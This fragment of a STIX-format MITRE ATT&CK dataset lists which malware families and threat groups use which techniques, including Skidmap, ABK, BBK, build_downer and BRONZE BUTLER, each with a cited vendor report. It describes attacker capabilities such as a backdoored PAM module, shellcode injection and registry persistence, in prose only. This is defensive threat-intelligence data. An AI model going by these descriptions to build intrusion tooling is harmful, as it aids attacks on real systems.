+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to set SELinux to permissive mode.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--f474fc4e-8fd4-4c67-b55c-23c67807a94f",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.162Z",
+ "created": "2020-06-09T21:23:39.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has installed itself via crontab.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--40f49d74-4d0f-467a-be79-cd57559d8230",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.211Z",
+ "created": "2020-06-09T21:23:39.176Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--61cfe134-e24e-490e-a298-40612df42832",
+ "type": "relationship",
+ "modified": "2020-06-26T04:03:50.768Z",
+ "created": "2020-06-09T21:23:39.177Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has used pm.sh to download and install its main payload.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--b3bcdaeb-e4d7-403d-902e-df55aa5b6bb9",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.198Z",
+ "created": "2020-06-09T21:23:39.179Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) has used a custom base64 alphabet to decode files.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d8557c07-240a-4dbb-b372-1111a05a5303",
+ "type": "relationship",
+ "modified": "2020-06-10T14:44:23.140Z",
+ "created": "2020-06-10T14:44:23.140Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to identify the installed anti-virus product on the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--07173c7c-335d-488b-b3ff-2f94168500db",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.160Z",
+ "created": "2020-06-10T17:28:46.682Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--97fe312d-7a04-43f9-8076-69fe324517ce",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.164Z",
+ "created": "2020-06-10T17:28:46.706Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3c8467e6-0878-4c62-afe6-55f124872089",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.167Z",
+ "created": "2020-06-10T17:28:46.709Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to download files from C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9ffa4f56-8fe5-4439-897d-df432bccb52d",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.185Z",
+ "created": "2020-06-10T17:28:46.725Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used steganography in multiple operations to conceal malicious payloads.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f5777849-9cea-4e02-93ba-9065b27f0e58",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.187Z",
+ "created": "2020-06-10T17:43:03.538Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6e122559-0e6e-4514-aa60-652e99292077",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.163Z",
+ "created": "2020-06-10T17:43:03.820Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eda69379-85f5-4512-aadc-ed7f5d2883bf",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.184Z",
+ "created": "2020-06-10T17:50:30.129Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2dcfc7b7-ead5-4996-b70d-205d4f9d59f5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.381Z",
+ "created": "2020-06-10T18:15:11.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--576db5e8-7371-4dea-ada9-599cc231e727",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.391Z",
+ "created": "2020-06-10T18:15:11.862Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7562ef46-c452-4338-9e06-3afdcf2c0e04",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.394Z",
+ "created": "2020-06-10T18:15:11.864Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--57bf4742-638a-41fe-8c09-e0f690b74190",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.378Z",
+ "created": "2020-06-10T18:20:44.112Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7b46066e-4e23-4391-833a-651ea1e0982d",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.388Z",
+ "created": "2020-06-10T18:20:44.115Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--51151669-a076-4d4a-af68-cf303baf01d5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.418Z",
+ "created": "2020-06-10T18:22:16.978Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to use the CreatePipe API to add a sub-process for execution via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f8f24599-854a-4795-891b-c28d89b8ddcc",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.430Z",
+ "created": "2020-06-10T18:29:32.028Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5",
+ "external_references": [
+ {
+ "source_name": "ESET TeleBots Oct 2018",
+ "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018."
+ }
+ ],
+ "description": "(Citation: ESET TeleBots Oct 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--40ecbb46-642a-4742-be84-8ec34382e7c0",
+ "type": "relationship",
+ "modified": "2020-06-10T18:36:54.630Z",
+ "created": "2020-06-10T18:36:54.630Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "malware--11194d8b-fdce-45d2-8047-df15bb8f16bd",
+ "external_references": [
+ {
+ "source_name": "ESET TeleBots Oct 2018",
+ "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018."
+ }
+ ],
+ "description": "(Citation: ESET TeleBots Oct 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3bf307c2-efb0-40b1-b896-82d15a9bce5f",
+ "type": "relationship",
+ "modified": "2020-06-10T18:36:54.633Z",
+ "created": "2020-06-10T18:36:54.633Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "malware--3249e92a-870b-426d-8790-ba311c1abfb4",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike GTR 2019",
+ "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2019GlobalThreatReport.pdf",
+ "description": "CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "Secureworks IRON VIKING ",
+ "url": "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike GTR 2019)(Citation: Secureworks IRON VIKING )",
+ "relationship_type": "uses",
+ "id": "relationship--f7bfecc9-a5ff-43c4-ad9e-4ca8c64c7fe2",
+ "type": "relationship",
+ "modified": "2020-06-10T18:36:54.635Z",
+ "created": "2020-06-10T18:36:54.635Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb",
+ "external_references": [
+ {
+ "source_name": "NCSC Sandworm Feb 2020",
+ "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory",
+ "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "(Citation: NCSC Sandworm Feb 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c5dd0d66-99f1-4efd-b0f9-bf9f9118ff16",
+ "type": "relationship",
+ "modified": "2020-06-10T18:36:54.638Z",
+ "created": "2020-06-10T18:36:54.638Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has added itself to the Registry Run key as \"NVIDIA\" to appear legitimate.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--506ed241-ba1e-47da-901a-d1943510d4b5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.415Z",
+ "created": "2020-06-10T19:31:48.042Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to add itself to the Registry Run key for persistence.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5266fdd9-f62e-4412-b5d0-d26ba6d5a1ab",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.434Z",
+ "created": "2020-06-10T19:31:48.047Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
